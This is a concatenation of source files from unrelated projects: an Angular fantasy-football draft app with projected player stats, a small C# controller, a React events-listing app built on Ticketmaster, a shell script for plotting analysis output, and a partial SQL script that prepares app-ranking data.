"YDS": 540.5,
"TDS": 2.4,
"ATT": 0.5,
"YDS_1": 1.4,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 115.7
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 42.5,
"YDS": 543.3,
"TDS": 3.1,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 114.9
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 43.7,
"YDS": 548.5,
"TDS": 2.7,
"ATT": 0.5,
"YDS_1": 1.1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 114.7
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 35.7,
"YDS": 553.2,
"TDS": 3.5,
"ATT": 2.5,
"YDS_1": 16.1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 113.6
},
{
"Player": "<NAME>",
"Team": "OAK",
"REC": 39.9,
"YDS": 524.8,
"TDS": 3.5,
"ATT": 0.5,
"YDS_1": 2.9,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 113.4
},
{
"Player": "<NAME>",
"Team": "DAL",
"REC": 45.8,
"YDS": 494.6,
"TDS": 2.6,
"ATT": 2,
"YDS_1": 10.4,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 111.8
},
{
"Player": "<NAME>",
"Team": "BAL",
"REC": 37.6,
"YDS": 527.8,
"TDS": 2.9,
"ATT": 1.8,
"YDS_1": 10.9,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 109
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 38,
"YDS": 487.3,
"TDS": 3.7,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 108.7
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 39.9,
"YDS": 462.8,
"TDS": 2.7,
"ATT": 1.4,
"YDS_1": 7.9,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 102.8
},
{
"Player": "<NAME>",
"Team": "BUF",
"REC": 31.1,
"YDS": 503.5,
"TDS": 3.4,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 101.6
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 37.2,
"YDS": 483.2,
"TDS": 2.6,
"ATT": 0.6,
"YDS_1": 1.2,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 101.2
},
{
"Player": "<NAME>",
"Team": "CLE",
"REC": 35.2,
"YDS": 469.7,
"TDS": 3.1,
"ATT": 0.1,
"YDS_1": 0.6,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 100.5
},
{
"Player": "<NAME>",
"Team": "NO",
"REC": 32.8,
"YDS": 471.9,
"TDS": 3,
"ATT": 0.1,
"YDS_1": 0.4,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 98
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 34.5,
"YDS": 437.8,
"TDS": 2.6,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 93.3
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 35.9,
"YDS": 442.5,
"TDS": 2.2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 93.2
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 35.5,
"YDS": 423.4,
"TDS": 2.3,
"ATT": 1.3,
"YDS_1": 7.6,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 92.7
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 33.2,
"YDS": 434.1,
"TDS": 2.3,
"ATT": 2.5,
"YDS_1": 17.5,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 92.1
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 32.4,
"YDS": 402.4,
"TDS": 2.8,
"ATT": 3.2,
"YDS_1": 20.9,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 91.9
},
{
"Player": "<NAME>",
"Team": "TEN",
"REC": 34,
"YDS": 429.8,
"TDS": 2.3,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 90.5
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 28.8,
"YDS": 434.3,
"TDS": 2.6,
"ATT": 1.4,
"YDS_1": 7.9,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 88.7
},
{
"Player": "<NAME>",
"Team": "OAK",
"REC": 36,
"YDS": 396.3,
"TDS": 2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 87.6
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 32.7,
"YDS": 404.7,
"TDS": 2.3,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 86.9
},
{
"Player": "<NAME>",
"Team": "BAL",
"REC": 27.7,
"YDS": 395.7,
"TDS": 2.3,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 81.1
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 29.3,
"YDS": 362,
"TDS": 1.9,
"ATT": 2.5,
"YDS_1": 15.2,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 78.8
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 28.7,
"YDS": 380.7,
"TDS": 1.8,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 77.6
},
{
"Player": "<NAME>",
"Team": "HOU",
"REC": 23.8,
"YDS": 352.7,
"TDS": 2.4,
"ATT": 0,
"YDS_1": -0.1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 73.1
},
{
"Player": "<NAME>",
"Team": "CIN",
"REC": 25.9,
"YDS": 330.9,
"TDS": 2.2,
"ATT": 2,
"YDS_1": 9.9,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 72.9
},
{
"Player": "<NAME>",
"Team": "LAC",
"REC": 21.5,
"YDS": 337.4,
"TDS": 2,
"ATT": 5.9,
"YDS_1": 36.7,
"TDS_1": 0.4,
"FL": 0.1,
"FPTS": 72.7
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 25.8,
"YDS": 332.6,
"TDS": 2.1,
"ATT": 1.3,
"YDS_1": 8.1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 72.2
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 21.9,
"YDS": 303.7,
"TDS": 2.1,
"ATT": 5.8,
"YDS_1": 37.7,
"TDS_1": 0.5,
"FL": 0.1,
"FPTS": 71.5
},
{
"Player": "<NAME>",
"Team": "NYG",
"REC": 23.5,
"YDS": 352.2,
"TDS": 2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 70.6
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 25.1,
"YDS": 335.2,
"TDS": 2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 70.3
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 23.2,
"YDS": 321.1,
"TDS": 2.4,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0,
"FPTS": 69.6
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 98.2,
"YDS": 1236.1,
"TDS": 9.5,
"FL": 0.6,
"FPTS": 277.8
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 85.7,
"YDS": 1180.3,
"TDS": 6.6,
"FL": 0.3,
"FPTS": 242.7
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 90.5,
"YDS": 956,
"TDS": 6.9,
"FL": 0.5,
"FPTS": 226.7
},
{
"Player": "<NAME>",
"Team": "NYG",
"REC": 68.8,
"YDS": 824.5,
"TDS": 5.4,
"FL": 0.4,
"FPTS": 182.7
},
{
"Player": "<NAME>",
"Team": "NO",
"REC": 63.3,
"YDS": 794.5,
"TDS": 6,
"FL": 0.3,
"FPTS": 177.8
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 57.2,
"YDS": 816.1,
"TDS": 6.5,
"FL": 0.5,
"FPTS": 176.6
},
{
"Player": "<NAME>",
"Team": "LAC",
"REC": 54.9,
"YDS": 696.3,
"TDS": 6,
"FL": 0.3,
"FPTS": 159.6
},
{
"Player": "<NAME>",
"Team": "PIT",
"REC": 59.6,
"YDS": 677.7,
"TDS": 4.8,
"FL": 0.5,
"FPTS": 155.1
},
{
"Player": "<NAME>",
"Team": "ATL",
"REC": 62.4,
"YDS": 608.3,
"TDS": 4.4,
"FL": 0.3,
"FPTS": 148.9
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 62.8,
"YDS": 631.9,
"TDS": 3.8,
"FL": 0.5,
"FPTS": 147.6
},
{
"Player": "<NAME>",
"Team": "CLE",
"REC": 53.6,
"YDS": 629.7,
"TDS": 4.8,
"FL": 0.3,
"FPTS": 144.8
},
{
"Player": "<NAME>",
"Team": "TEN",
"REC": 53.1,
"YDS": 587.3,
"TDS": 3.8,
"FL": 0.5,
"FPTS": 133.9
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 48.4,
"YDS": 545.8,
"TDS": 5.2,
"FL": 0.4,
"FPTS": 133.1
},
{
"Player": "<NAME>",
"Team": "GB",
"REC": 52.4,
"YDS": 563.6,
"TDS": 4.1,
"FL": 0.3,
"FPTS": 132.8
},
{
"Player": "<NAME>",
"Team": "BAL",
"REC": 45.9,
"YDS": 603.1,
"TDS": 3.9,
"FL": 0.2,
"FPTS": 129.4
},
{
"Player": "<NAME>",
"Team": "CHI",
"REC": 48.5,
"YDS": 526.6,
"TDS": 4.4,
"FL": 0.4,
"FPTS": 127
},
{
"Player": "<NAME>",
"Team": "DET",
"REC": 50.2,
"YDS": 543.2,
"TDS": 3.9,
"FL": 0.9,
"FPTS": 126.3
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 45.7,
"YDS": 534.9,
"TDS": 4.5,
"FL": 0.2,
"FPTS": 125.8
},
{
"Player": "<NAME>",
"Team": "MIN",
"REC": 50.8,
"YDS": 495.6,
"TDS": 4,
"FL": 0.2,
"FPTS": 124
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 52.9,
"YDS": 496.8,
"TDS": 3.8,
"FL": 0.9,
"FPTS": 123.4
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 38.5,
"YDS": 473.8,
"TDS": 4.6,
"FL": 0.4,
"FPTS": 112.6
},
{
"Player": "<NAME>",
"Team": "DAL",
"REC": 45.9,
"YDS": 448.8,
"TDS": 3.4,
"FL": 0.3,
"FPTS": 110.7
},
{
"Player": "<NAME>",
"Team": "DEN",
"REC": 43.2,
"YDS": 479.7,
"TDS": 3.3,
"FL": 0.7,
"FPTS": 109.5
},
{
"Player": "<NAME>",
"Team": "CIN",
"REC": 40.1,
"YDS": 445.3,
"TDS": 3.4,
"FL": 0.2,
"FPTS": 104.9
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 34.2,
"YDS": 356.3,
"TDS": 4,
"FL": 0.2,
"FPTS": 93.2
},
{
"Player": "<NAME>",
"Team": "OAK",
"REC": 34.3,
"YDS": 374,
"TDS": 3.2,
"FL": 0.2,
"FPTS": 90.2
},
{
"Player": "<NAME>",
"Team": "SEA",
"REC": 28.6,
"YDS": 383.9,
"TDS": 3.4,
"FL": 0.2,
"FPTS": 87.1
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 35.6,
"YDS": 349.3,
"TDS": 2,
"FL": 0.2,
"FPTS": 82.3
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 30.1,
"YDS": 315.7,
"TDS": 3.4,
"FL": 0.5,
"FPTS": 81.1
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 29.1,
"YDS": 366.4,
"TDS": 2.4,
"FL": 0.2,
"FPTS": 79.5
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 33.5,
"YDS": 330.4,
"TDS": 1.9,
"FL": 0.5,
"FPTS": 76.7
},
{
"Player": "<NAME>",
"Team": "LAR",
"REC": 28.4,
"YDS": 307.2,
"TDS": 2.6,
"FL": 0.2,
"FPTS": 74.2
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 30.2,
"YDS": 277.5,
"TDS": 1.8,
"FL": 0.3,
"FPTS": 68.1
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 27.2,
"YDS": 276.5,
"TDS": 2,
"FL": 0.2,
"FPTS": 66.5
},
{
"Player": "<NAME>.",
"Team": "MIN",
"REC": 26.5,
"YDS": 274.8,
"TDS": 2,
"FL": 0.5,
"FPTS": 64.9
},
{
"Player": "<NAME>",
"Team": "NE",
"REC": 23.7,
"YDS": 268.1,
"TDS": 2.1,
"FL": 0.1,
"FPTS": 62.7
},
];
return {players, teams, stats};
}
}
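// Added note (a sketch, assuming this file backs angular-in-memory-web-api's
// InMemoryDbService): each key in the object returned above becomes its own REST
// collection, which is what the services below request, e.g.
//   GET  api/players              -> the draft pool defined in `players`
//   GET  api/stats/?Player=<name> -> one player's projected stat line
//   POST api/teams                -> saves a drafted team (`teams` starts empty)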
<file_sep>import { Injectable } from '@angular/core';
import { Observable } from 'rxjs';
import { catchError, tap } from 'rxjs/operators';
import { HttpClient } from '@angular/common/http';
import { MessageService } from './message.service';
@Injectable({
  providedIn: 'root'
})
export class StatsService {
  // Projected stats are served by the in-memory web API; actual numbers by a local json-server.
  private statsUrl = 'api/stats';
  private numbersUrl = 'http://localhost:3000/players';
  // private numbersUrl = 'http://api.fantasy.nfl.com/v1/players/stats?statType=seasonStats&season=2019&format=json/players';
  constructor(private http: HttpClient, private messageService: MessageService) { }
  /** GET a player's projected stat line, matched by name. */
  searchPlayer(term: string): Observable<any> {
    return this.http.get<any>(`${this.statsUrl}/?Player=${term}`)
      .pipe(
        tap(() => console.log('Fetched projected stats')),
        catchError(this.messageService.handleError)
      );
  }
  /** GET a player's actual stat line, matched by name. */
  getStats(term: string): Observable<any> {
    return this.http.get<any>(`${this.numbersUrl}/?name=${term}`)
      .pipe(
        tap(() => console.log('Fetched actual stats')),
        catchError(this.messageService.handleError)
      );
  }
}
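// Hedged usage sketch (not part of the original service): how a consumer can pull a
// player's projected and actual lines side by side. `demoPlayerStats` and the
// player-name argument are illustrative, not app code.
export function demoPlayerStats(statsService: StatsService, playerName: string): void {
  // Projections come from the in-memory API; actual numbers from the local json-server.
  statsService.searchPlayer(playerName)
    .subscribe(projected => console.log('Projected line:', projected));
  statsService.getStats(playerName)
    .subscribe(actual => console.log('Actual line:', actual));
}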
<file_sep>import { Player } from '../shared/player';
/** A user-created fantasy team: its id, display name, creation info, and drafted players. */
export class Team {
  id: number;
  name: string;
  created: object;
  players: Player[];
}<file_sep>import { Component, OnInit, Input } from '@angular/core';
import { Observable, of } from 'rxjs';
import { StatsService } from "../services/stats.service";
@Component({
selector: 'app-stats',
templateUrl: './stats.component.html',
styleUrls: ['./stats.component.css']
})
export class StatsComponent implements OnInit {
stats: any;
numbers: any;
QB: boolean = false;
RB: boolean = false;
WR: boolean = false;
TE: boolean = false;
@Input() sendPlayer;
constructor( private statsService: StatsService ) { }
ngOnInit() { this.statsService.searchPlayer(this.sendPlayer.name)
.subscribe(stats => this.stats = stats);
this.statsService.getStats(this.sendPlayer.name)
.subscribe(numbers => this.numbers = numbers);
this.getPosition();
}
  getPosition() {
    // Set the flag that matches the selected player's position.
    this.QB = this.sendPlayer.position === "QB";
    this.RB = this.sendPlayer.position === "RB";
    this.WR = this.sendPlayer.position === "WR";
    this.TE = this.sendPlayer.position === "TE";
  }
}
<file_sep>import { Injectable } from '@angular/core';
import { Observable, of, BehaviorSubject } from 'rxjs';
import { catchError, map, tap } from 'rxjs/operators';
import { Team } from '../shared/team';
import { HttpClient, HttpHeaders } from '@angular/common/http';
import { MessageService } from './message.service';
@Injectable({
providedIn: 'root'
})
export class TeamService {
team: Team;
private teamsUrl = 'api/teams';
httpOptions = {
headers: new HttpHeaders({ 'Content-Type': 'application/json' })
};
private teamSource = new BehaviorSubject( this.team );
currentTeam = this.teamSource.asObservable();
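  // Components subscribe to currentTeam; sendTeam() pushes a new Team to every subscriber.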
constructor(private http: HttpClient, private messageService: MessageService) { }
sendTeam(team) {
this.teamSource.next(team);
}
getTeams(): Observable<Team[]> {
return this.http.get<Team[]>(this.teamsUrl)
.pipe(
tap(() => console.log('Fetched teams')),
catchError(this.messageService.handleError)
);
}
addTeam(team: Team): Observable<Team> {
return this.http.post<Team>(this.teamsUrl, team, this.httpOptions)
.pipe(
tap((team: Team) => console.log(`Added team w/ id=${team.id}`)),
catchError(this.messageService.handleError)
);
}
deleteTeam(team: Team): Observable<Team> {
const id = team.id;
console.log(id);
const url = `${this.teamsUrl}/${id}`;
return this.http.delete<Team>(url, this.httpOptions).pipe(
tap((team: Team) => console.log(`Deleted team w/ id=${id}`)),
catchError(this.messageService.handleError)
);
}
}
<file_sep>import { Injectable } from '@angular/core';
import { Observable, of } from 'rxjs';
import { catchError, map, tap } from 'rxjs/operators';
// import { PLAYERS } from '../player_list';
import { Player } from '../shared/player';
import { HttpClient, HttpHeaders } from '@angular/common/http';
import { MessageService } from './message.service';
@Injectable({
providedIn: 'root'
})
export class PlayerService {
private playersUrl = 'api/players';
constructor(private http: HttpClient, private messageService: MessageService) { }
// getPlayers(): Observable<Player[]> {
// return of(PLAYERS);
// }
getPlayers(): Observable<Player[]> {
return this.http.get<Player[]>(this.playersUrl)
.pipe(
tap(() => console.log('Fetched players')),
catchError(this.messageService.handleError)
);
}
// getPlayer(name: string): Observable<Player> {
// return of(PLAYERS.find(player => player.name === name));
// }
getPlayer(id: number): Observable<Player> {
const url = `${this.playersUrl}/${id}`;
return this.http.get<Player>(url)
.pipe(
tap(() => console.log(`Fetched player with id = ${id}`)),
catchError(this.messageService.handleError)
);
}
getPlayersByPosition(term: string): Observable<Player[]> {
return this.http.get<Player[]>(`${this.playersUrl}/?position=${term}`)
.pipe(
// map(stats => {this.stats = stats}),
      tap(() => console.log('Fetched players by position')),
catchError(this.messageService.handleError)
);
}
}
<file_sep>import { BrowserModule } from '@angular/platform-browser';
import { Injector, NgModule } from '@angular/core';
import { FormsModule } from '@angular/forms';
import { ReactiveFormsModule } from '@angular/forms';
import { AppComponent } from './app.component';
import { PlayersComponent } from './players/players.component';
import { HeaderComponent } from './header/header.component';
import { TeamsComponent } from './teams/teams.component';
import { RoutingModule } from './routing/routing.module';
import { PlayerDetailComponent } from './playerdetail/playerdetail.component';
import { HttpClientModule } from '@angular/common/http';
import { HttpClientInMemoryWebApiModule } from 'angular-in-memory-web-api';
import { InMemoryDataService } from './services/in-memory-data.service';
import { StatsComponent } from './stats/stats.component';
import { HighlightDirective } from './directives/highlight.directive';
@NgModule({
declarations: [
AppComponent,
PlayersComponent,
HeaderComponent,
TeamsComponent,
PlayerDetailComponent,
StatsComponent,
HighlightDirective
],
imports: [
BrowserModule,
FormsModule,
ReactiveFormsModule,
RoutingModule,
HttpClientModule,
HttpClientInMemoryWebApiModule.forRoot(
InMemoryDataService, { dataEncapsulation: false, passThruUnknownUrl: true }
)
],
providers: [],
bootstrap: [AppComponent]
})
export class AppModule { }
<file_sep>import { Routes } from '@angular/router';
import { PlayersComponent } from '../players/players.component';
import { TeamsComponent } from '../teams/teams.component';
import { PlayerDetailComponent } from '../playerdetail/playerdetail.component';
export const routes: Routes = [
{ path: 'home', component: PlayersComponent },
{ path: 'team', component: TeamsComponent },
{ path: 'playerdetail/:id', component: PlayerDetailComponent },
{ path: '', redirectTo: '/home', pathMatch: 'full' }
];
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
namespace WebVentas.Areas.Users.Controllers
{
[Area("Users")]//Especificamos la Area del controlador
public class UsersController : Controller
{
public IActionResult Users()
{
return View();
}
}
}
<file_sep>/* eslint-disable react/prop-types */
import React from 'react';
// import PropTypes from 'prop-types';
import Popup from 'reactjs-popup';
import MapView from './MapView';
import '../styles/PopupCard.css';
const PopupCard = ({
listing,
date,
time,
venue,
address,
ticket,
location
}) => {
return (
<Popup
trigger={
<button className="trigger-button" type="button">
More Info
</button>
}
modal
nested
>
{(close) => (
<div className="popup">
<button className="close" onClick={close} type="button">
×
</button>
<div className="header"> {listing} </div>
<div className="content">
<p>Date: {date}</p>
<p>Time Start: {time}</p>
<p>Venue: {venue}</p>
<p>
              Address: {address.address.line1}, {address.city.name},{' '}
              {address.postalCode}
</p>
{address.accessibleSeatingDetail !== undefined
? `Accessibility: ${address.accessibleSeatingDetail}`
: 'Accessibility: Apologies, no accessibility information'}
<div className="buy-tickets">{ticket}</div>
{location && <MapView location={location} listing={listing} />}
</div>
<div className="actions">
<button
className="close-button"
onClick={() => {
close();
}}
type="button"
>
close
</button>
</div>
</div>
)}
</Popup>
);
};
// PopupCard.propTypes = {
// listing: PropTypes.string.isRequired,
// date: PropTypes.number.isRequired,
// time: PropTypes.number.isRequired,
// venue: PropTypes.string.isRequired,
// address: PropTypes.shape({
// address: PropTypes.shape({
// line1: PropTypes.string
// }).isRequired,
// city: PropTypes.shape({
// name: PropTypes.string
// }).isRequired,
// postalCode: PropTypes.string,
// accessibleSeatingDetail: PropTypes.string
// }).isRequired,
// ticket: PropTypes.string.isRequired,
// location: PropTypes.objectOf(PropTypes.number).isRequired
// };
export default PopupCard;
<file_sep># Tonight

What is there to do in my city? That is the question this app tries to help answer. Tonight provides information about events going on in your city now and in the future, should you wish to book ahead of time.
## About the application
This is a React application backed by an Express.js proxy API (deployed on AWS with Serverless), which in turn queries the Ticketmaster API to return events for the UK city entered in the search bar. This is likely to be expanded and refined in the future, should we decide to take this beyond our course.
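As a rough sketch, the client's call to the proxy looks something like the snippet below (the endpoint URL and the `city` query parameter are illustrative placeholders, not the deployed names):

```js
// Hypothetical helper showing the request flow: React app -> Express proxy -> Ticketmaster.
const PROXY_URL = 'https://example.execute-api.amazonaws.com/events'; // placeholder endpoint

async function fetchEvents(city) {
  const response = await fetch(`${PROXY_URL}?city=${encodeURIComponent(city)}`);
  if (!response.ok) {
    throw new Error(`Proxy request failed with status ${response.status}`);
  }
  return response.json(); // the proxy returns Ticketmaster's event list as JSON
}
```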
## Stack Employed
- ReactJS
- AWS deployed using serverless
- Express.js
## Project Status
This project is still in development and the MVP is not yet complete.
## Screenshots / Media
Main search for same-day events
<file_sep>import { render } from '@testing-library/react';
import App from '../components/App';
test('matches the App snapshot', () => {
  const { asFragment } = render(<App />);
  expect(asFragment()).toMatchSnapshot();
});
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import '../styles/Nav.css';
import { useAuth0 } from '@auth0/auth0-react';
import Logo from '../Assets/tonight-logo.png';
const Nav = () => {
const { loginWithRedirect, logout, user, isLoading } = useAuth0();
return (
<div className="nav-div">
<Link to="/" className="Logo">
<img src={Logo} alt="logo" />
</Link>
{!isLoading && !user && (
<button type="button" className="Login" onClick={loginWithRedirect}>
Login
</button>
)}
{!isLoading && user && (
<>
<Link to="/account" className="Account-title">
My Account
</Link>
<button type="button" className="Logout" onClick={() => logout()}>
Logout
</button>
</>
)}
</div>
);
};
export default Nav;
<file_sep>import MainText from '../Assets/tonight-main.png';
import '../styles/landing-page.css';
const LandingPage = () => {
return (
<div className="landing-page-container">
<h3 className="WhatsOn">WHATS ON..</h3>
<img className="tonight-text" src={MainText} alt="tonight-logo" />
</div>
);
};
export default LandingPage;
<file_sep>import React from 'react';
import PropTypes from 'prop-types';
import '../styles/EventCard.css';
import PopupCard from './PopupCard';
const EventCards = ({
listing,
image,
venue,
address,
date,
time,
tickets,
location,
addFavourite,
id
}) => {
return (
<div className="eventCards">
<div className="eventCards_listing">{listing}</div>
<button
type="button"
onClick={() => addFavourite(id)}
className="Favorite"
>
♡ Favourite Event
</button>
<div className="eventCards_images">{image}</div>
<div className="eventCards_venue">{venue}</div>
<div className="eventCards_date">{date}</div>
<div className="eventCards_time">{time}</div>
<button className="eventCards_button" type="button">
<PopupCard
listing={listing}
ticket={tickets}
date={date}
time={time}
venue={venue}
address={address}
location={location}
/>
</button>
</div>
);
};
EventCards.propTypes = {
listing: PropTypes.string.isRequired,
image: PropTypes.string.isRequired,
venue: PropTypes.string.isRequired,
date: PropTypes.string.isRequired,
time: PropTypes.string.isRequired,
tickets: PropTypes.string.isRequired,
location: PropTypes.objectOf(PropTypes.number).isRequired,
address: PropTypes.objectOf(PropTypes.string).isRequired,
addFavourite: PropTypes.func.isRequired,
id: PropTypes.string.isRequired
};
export default EventCards;
<repo_name>asutherland-aa/aa-data-science-alex-branch-test<file_sep>/old_investigations/generate_everything.sh
# This is an example of using various scripts to generate everything
declare -a countries=('United States' 'China' 'Japan' 'South Korea')
#declare -a countries=('United States')
declare year=2012
declare month=07
declare month_end=31
## Prepare the data
#python run_fetch_and_concat.py -s 143441,143444,143462,143465,143466 -d "${year}-${month}" -u Downloads,USD
#python run_fetch_and_concat.py -s 143441,143465,143462,143466 -d "${year}-${month}" -u Downloads,USD
for ((i=0; i<${#countries[@]}; i++))
do
c=${countries[$i]}
echo "Calculating SDA for ${c}..."
python run_calculate_sda.py -d "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_Downloads.csv" -u "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_USD.csv"
#-r "Rafael_data_July/${c}/AppAnnie_Estimates.csv"
echo "Generating Plots..."
Rscript plot_80_20.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_dist.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_improvement.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
#Rscript plot_80_20_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
#Rscript plot_dist_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
#Rscript plot_improvement_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_80_20_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_dist_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_improvement_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
echo "Finished, check the ./plots folder"
done
<file_sep>/int-vs-m-benchmark/sql/ios/1000d3-prepare_application_data-join_transactional_data.sql
/*
FUNCTIONAL DESCRIPTION : Determine if apps are universal
Determine if apps are monitor apps (universal apps cannot be monitor apps?)
Determine whether apps have in-app purchases (if null, assume they do?)
Create table structure to store regression results
DEPENDS ON TABLE(S) : temp.ranking_application_data, temp.in_app, temp.transactional_data
RESULTS IN TABLE(S) : temp.application_data
PROCEDURE : STEP 1.
*/
-- RETRIEVING APPLICATION DATA FROM RANKINGS --
DROP TEMPORARY TABLE IF EXISTS temp.application_data;
CREATE TEMPORARY TABLE temp.application_data(
date date NOT NULL,
device_id TINYINT unsigned NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
application_id int(10) unsigned NOT NULL,
universal_app TINYINT unsigned NOT NULL,
monitor_app TINYINT unsigned NOT NULL,
price_usd decimal(9,2) DEFAULT NULL,
    -- price_changed cannot be null?
price_changed TINYINT unsigned NOT NULL,
has_inapps TINYINT unsigned NOT NULL,
real_value decimal(9,2) DEFAULT NULL,
derived_value decimal(9,2) DEFAULT NULL,
derived_value_source VARCHAR(50) DEFAULT NULL,
estimate decimal(9,2) DEFAULT NULL,
estimate_source VARCHAR(50) DEFAULT NULL,
estimate_category_id smallint(5) unsigned DEFAULT NULL,
estimate_rank smallint(5) unsigned DEFAULT NULL,
estimate_extrapolated TINYINT unsigned DEFAULT NULL,
n smallint(5) unsigned DEFAULT NULL,
rsquare decimal(5,4) DEFAULT NULL,
fit_order TINYINT unsigned DEFAULT NULL,
stdev decimal(5,4) DEFAULT NULL,
df TINYINT unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (date, device_id,country_id, type, application_id),
INDEX category_index (date, device_id,country_id, type, estimate_category_id, estimate_rank)
)
SELECT
r.date,
r.device_id,
r.country_id,
r.type,
r.application_id,
-- definite universal determination:
IF(
r.type = 'gross',
GREATEST(IF(r.ranked_on_ipad AND r.ranked_on_iphone , 1, 0),IFNULL(t.iphone_app AND t.ipad_app,0)),
IFNULL(t.iphone_app AND t.ipad_app,IF(r.ranked_on_ipad AND r.ranked_on_iphone,1,0))
) AS universal_app,
IF(
IF(r.device_id = 1 AND (r.ranked_on_iphone = 1 OR t.iphone_app = 1),
t.value,
IF(r.device_id = 2 AND (r.ranked_on_ipad = 1 OR t.ipad_app = 1),
t.value,
null
)
) IS NOT NULL AND NOT
IF(
r.type = 'gross',
GREATEST(IF(r.ranked_on_ipad AND r.ranked_on_iphone , 1, 0),IFNULL(t.iphone_app AND t.ipad_app,0)),
IFNULL(t.iphone_app AND t.ipad_app,IF(r.ranked_on_ipad AND r.ranked_on_iphone,1,0))
),1,0) as monitor_app,
r.price_usd,
r.price_changed,
IFNULL(i.has_inapps,1) as has_inapps,
IF(r.device_id = 1 AND (r.ranked_on_iphone = 1 OR t.iphone_app = 1),
t.value,
IF(r.device_id = 2 AND (r.ranked_on_ipad = 1 OR t.ipad_app = 1),
t.value,
null
)
) AS real_value,
null AS derived_value,
null AS derived_value_source,
null AS estimate,
null AS estimate_source,
null AS estimate_category_id,
null AS estimate_rank,
